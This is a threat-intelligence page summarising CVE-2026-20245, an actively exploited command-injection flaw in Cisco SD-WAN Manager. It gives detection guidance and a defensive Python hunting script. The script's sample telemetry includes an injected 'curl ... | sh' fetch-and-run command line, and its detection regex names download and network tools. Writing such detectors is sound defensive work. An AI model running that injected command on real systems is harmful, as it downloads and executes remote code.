ctipilot.ch

Cisco Catalyst SD-WAN Manager command-injection to root (actively exploited, no patch)

cve · CVE-2026-20245

Coverage timeline: 1 (first 2026-06-06 → last 2026-06-06)
Briefs: 1 (1 distinct)
Sources cited: 47 (29 hosts)
Sections touched: 1 (trending_vulns)
Co-occurring entities: 3 (see Related entities below)

Story timeline

  1. 2026-06-06 · CTI Daily Brief — 2026-06-06 (trending_vulns)
     First coverage. Second SD-WAN Manager zero-day; post-auth (netadmin) command injection to root, chainable with pre-auth CVE-2026-20182; Cisco confirms limited ITW config-push exploitation; no patch.

Where this entity is cited

  • trending_vulns: 1

Source distribution

  • attack.mitre.org: 6 (13%)
  • blog.talosintelligence.com: 6 (13%)
  • sec.cloudapps.cisco.com: 5 (11%)
  • security-hub.ncsc.admin.ch: 2 (4%)
  • bleepingcomputer.com: 2 (4%)
  • thehackernews.com: 2 (4%)
  • theregister.com: 2 (4%)
  • bankinfosecurity.com: 1 (2%)
  • other: 21 (45%)

Related entities

External references

NVD · cve.org · CISA KEV

Items in briefs about Cisco Catalyst SD-WAN Manager command-injection to root (actively exploited, no patch) (1)

CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: actively-exploited command-injection to root (no patch)

From CTI Daily Brief — 2026-06-06 · published 2026-06-06

Cisco has confirmed a second actively exploited zero-day in Catalyst SD-WAN Manager (formerly vManage), tracked as CVE-2026-20245 (Cisco PSIRT; NCSC-CH GovCERT, 2026-06-05). It is a command-injection flaw: an attacker holding netadmin privileges can inject arbitrary OS commands that execute as root on the underlying appliance (T1059.004 Unix Shell, reached via T1078 Valid Accounts).

Exploitation path: per Cisco, exploitation requires either valid netadmin credentials or prior exploitation of the pre-auth bypass CVE-2026-20182 (covered in weekly W22) or CVE-2026-20127. The realistic path is therefore an unauthenticated-to-root chain against an internet-exposed Manager, in which the pre-auth bug supplies the netadmin session and CVE-2026-20245 turns that session into root on the appliance.

Blast radius: Cisco states it has "observed limited cases where the exploitation of this bug resulted in a configuration change pushed to edge devices". The impact is not confined to the management plane: root on the Manager lets the attacker push configuration to every edge router it manages, so each managed device is in scope of the compromise, not just the appliance.

Mitigation status: no fixed release is available. Cisco's only guidance is to restrict management-plane access to trusted hosts and to verify edge-device configuration.

Detection concepts: review the SD-WAN Manager CLI audit log for unexpected command execution, and EDR/host telemetry for shells spawned under the management daemon's service account (shell metacharacters or download tools in the spawned command line are the markers to look for); treat any unplanned configuration push to edge devices, particularly one shortly after such a shell, as a hunting trigger, and diff edge-device running configuration against the last approved template.

Hardening: ACL the management interface to a dedicated management VLAN, enforce MFA for netadmin, and, given confirmed in-the-wild use, rotate Manager credentials and review the local account list for entries you did not create. These are compensating controls only: until Cisco ships a fix, anyone who obtains a netadmin session can still reach root on the appliance.
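The hunting logic sketched in the detection concepts above, written out as an added example for this page (it is not Cisco tooling and does not parse Cisco's real audit-log or syslog formats). It flags root shells whose parent is the Manager's application process, configuration pushes with no approved change ticket or from outside the management subnet, and then pairs the two within a short window, which is the management-plane-to-edge pattern Cisco describes. The event field names, the daemon image names (`java`, `vmanage-server`), the shell list, the management subnet and all sample events are assumptions and constructed data, not captures from a real Manager.

```python
"""Hunting logic for CVE-2026-20245-style activity: root shells spawned by the
SD-WAN Manager's application process, unplanned configuration pushes to edge
devices, and the pairing of the two.

Added example for this page, not Cisco tooling; it does not parse Cisco's real
audit-log or syslog formats. Event field names, daemon image names, the shell
list and the management subnet are assumptions to replace with what your EDR
and SD-WAN Manager actually emit.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# Assumption: image names of the Manager's application processes (the parent
# of any injected command) and the shells such a command would run under.
MGMT_DAEMONS = {"java", "vmanage-server"}
SHELLS = {"sh", "bash", "dash"}
# Assumption: the only subnet netadmin sessions are permitted to come from.
MGMT_SUBNET = ipaddress.ip_network("10.10.0.0/24")
# Shell metacharacters and download/pivot tools inside a spawned command line.
INJECTION_RE = re.compile(r"[;&|`$]|\b(curl|wget|nc|ncat|python3?)\b")


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def suspicious_shells(proc_events):
    """Shells whose parent is a Manager daemon and that either run as root
    or carry injection markers in their command line."""
    hits = []
    for ev in proc_events:
        if ev["parent_image"] not in MGMT_DAEMONS or ev["image"] not in SHELLS:
            continue
        markers = INJECTION_RE.search(ev["cmdline"]) is not None
        if ev["user"] == "root" or markers:
            hits.append({"ts": ev["ts"], "cmdline": ev["cmdline"],
                         "root": ev["user"] == "root",
                         "injection_markers": markers})
    return hits


def unplanned_config_pushes(push_events, approved_tickets):
    """Config pushes to edge devices with no approved change ticket, or
    initiated from a netadmin session outside the management subnet."""
    hits = []
    for ev in push_events:
        reasons = []
        if ev.get("ticket") not in approved_tickets:
            reasons.append("no approved change ticket")
        if ipaddress.ip_address(ev["src_ip"]) not in MGMT_SUBNET:
            reasons.append("session from outside management subnet")
        if reasons:
            hits.append({"ts": ev["ts"], "user": ev["user"],
                         "devices": ev["devices"], "reasons": reasons})
    return hits


def correlate(shell_hits, push_hits, window=timedelta(minutes=15)):
    """Pair each suspicious shell with unplanned pushes that follow it within
    `window`: the management-plane-to-edge pattern Cisco reports."""
    pairs = []
    for s in shell_hits:
        t0 = parse_ts(s["ts"])
        for p in push_hits:
            delta = parse_ts(p["ts"]) - t0
            if timedelta(0) <= delta <= window:
                pairs.append((s["ts"], p["ts"], p["devices"]))
    return pairs


# Constructed sample telemetry (not real captures), in the assumed shapes.
PROC_EVENTS = [
    {"ts": "2026-06-04T22:00:00Z", "user": "root", "parent_image": "java",
     "image": "bash", "cmdline": "bash -c id"},
    {"ts": "2026-06-05T01:10:00Z", "user": "vmanage", "parent_image": "java",
     "image": "sh", "cmdline": "sh -c df -h"},
    {"ts": "2026-06-05T01:12:03Z", "user": "root", "parent_image": "java",
     "image": "sh",
     "cmdline": 'sh -c "ping -c 1 10.0.0.1; curl http://203.0.113.7/x | sh"'},
    {"ts": "2026-06-05T03:00:00Z", "user": "root", "parent_image": "cron",
     "image": "sh", "cmdline": "sh /etc/cron.daily/logrotate"},
]
PUSH_EVENTS = [
    {"ts": "2026-06-05T01:13:40Z", "user": "netadmin", "src_ip": "198.51.100.23",
     "devices": ["vedge-1", "vedge-2", "vedge-3"], "ticket": None},
    {"ts": "2026-06-05T09:30:00Z", "user": "netadmin", "src_ip": "10.10.0.21",
     "devices": ["vedge-1", "vedge-2"], "ticket": "CHG-4471"},
]
APPROVED_TICKETS = {"CHG-4471"}

if __name__ == "__main__":
    shells = suspicious_shells(PROC_EVENTS)
    pushes = unplanned_config_pushes(PUSH_EVENTS, APPROVED_TICKETS)
    for hit in shells:
        print("suspicious shell:", hit)
    for hit in pushes:
        print("unplanned push:", hit)
    for shell_ts, push_ts, devices in correlate(shells, pushes):
        print(f"chain: root shell at {shell_ts} then push at {push_ts} to {devices}")
```

Two caveats when adapting this: the Manager legitimately spawns shells from its application process, so the root-shell rule needs a baseline of normal command lines before it is alertable on its own, which is why the injection-marker flag and the pairing with an unplanned push carry the weight; and if host telemetry cannot be collected from the appliance, the audit-log and configuration-push rules are the ones left to run, so an approved-change list (the `approved_tickets` set here) is worth maintaining regardless.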